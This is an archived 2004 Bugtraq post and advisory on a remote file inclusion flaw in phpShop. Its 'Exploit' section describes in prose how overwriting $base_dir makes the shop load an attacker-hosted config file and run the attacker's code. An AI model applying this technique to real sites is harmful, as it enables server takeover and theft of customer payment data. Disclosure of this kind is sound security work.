Arbitrary code inclusion in phpShop

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Arbitrary code inclusion in phpShop
From: "Calum Power" <enune@xxxxxxx>
Date: Sun, 9 May 2004 00:14:11 -0700
Cc:
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

A vulnerability has been discovered in the popular E-Commerce package
'phpShop'. The vulnerability's details are available in the attached
advisory, or at http://www.fribble.net/advisories/phpshop_29-04-04.txt

Due to the nature of this vulnerability, I notified the lead programmer
for this package over a week ago, and no reply or patch has yet been
released.

Once again, this unfortunately another PHP package falling victim to
the 'register globals substitution' vulnerability that many other high-
profile packages have had (phpNuke, phpBB, just to name a couple). When
will people learn that replacing one bad configuration error with a (even
worse!) programming one is NOT the way to migrate into new versions of
PHP.

Regards,

Calum Power
- Cultural Jammer
- Security Enthusiast
- Hopeless Cynic
enune@xxxxxxx
http://www.fribble.net

-------------- 29/04/2004 --------------
Security Advisory - Arbitrary code inclusion vulnerability in phpShop

Discovered by: Calum Power [Enune]
Advisory Date: 29/04/2004
Versions Affected: <= 0.7.1
Unaffected versions: None Known (Developer contacted 29/04/04)

Product Description: (From product website)
phpShop is a PHP-based e-commerce application and PHP development framework. 
phpShop offers the basic features needed to run a successful e-commerce web 
site and 
to extend its capabilities for multiple purposes.

Summary:
Under certain circumstances, it may be possible to execute arbitrary code in 
the context of
the web server.


Details:
If PHP is configured (in php.ini, or otherwise) to have register_globals turned 
off, and the
PHP version is above or equal to 4.1, then a phpShop installation will initiate 
a 'fix' to
register all the globals in the HTTP_REQUEST into local variables. One of these 
variables is
the '$base_dir' variable, which is used to declare the base directory of the 
phpshop
installation. If the aforementioned events are triggered (as in most recent 
default PHP 
installations), it is possible to overwrite the $base_dir variable (in a GET, 
POST or COOKIE
declaration), and taint the many lines of code from 'htdocs/index.php
UPDATE(9/05): It has been discovered that ANY version of PHP with 
register_globals turned off
would be vulnerable to exploit.


Exploit:
An attacker would only need to create a file called 'phpshop.cfg' on his or her 
webserver 
in a directory called 'etc', and craft the base_dir variable to include the 
code from his webserver,
and the phpShop will include this code into it's page, assuming that the 
attacker's script is the 
configuration for the phpShop. It is then possible for the attacker to take 
control over the website
and/or server, and perform malicious activities at will.


Impact:
The impact of this vulnerability could be quite devastating for some companies, 
who rely on
the security of packages such as phpShop to run their businesses online. The 
ramifications 
could be things such as the redirection of deliveries to customers to an 
address the attacker
controls, or the hijacking of Credit Card details.

Thanks:
Greets to Mjec on freenode.net#php, rAchel from IdleThink, the guys at Phrack, 
and 
DI Michael Grant from the Tasmanian Fraud Investigation Squad. Censorship r0x 
my s0x.

Prev by Date: RE: An undetectable Online Bank Vulnerability?
Next by Date: OUTLOOK 2003: OuchLook
Previous by thread: [ GLSA 200405-02 ] Multiple vulnerabilities in LHa
Next by thread: OUTLOOK 2003: OuchLook
Index(es):
- Date
- Thread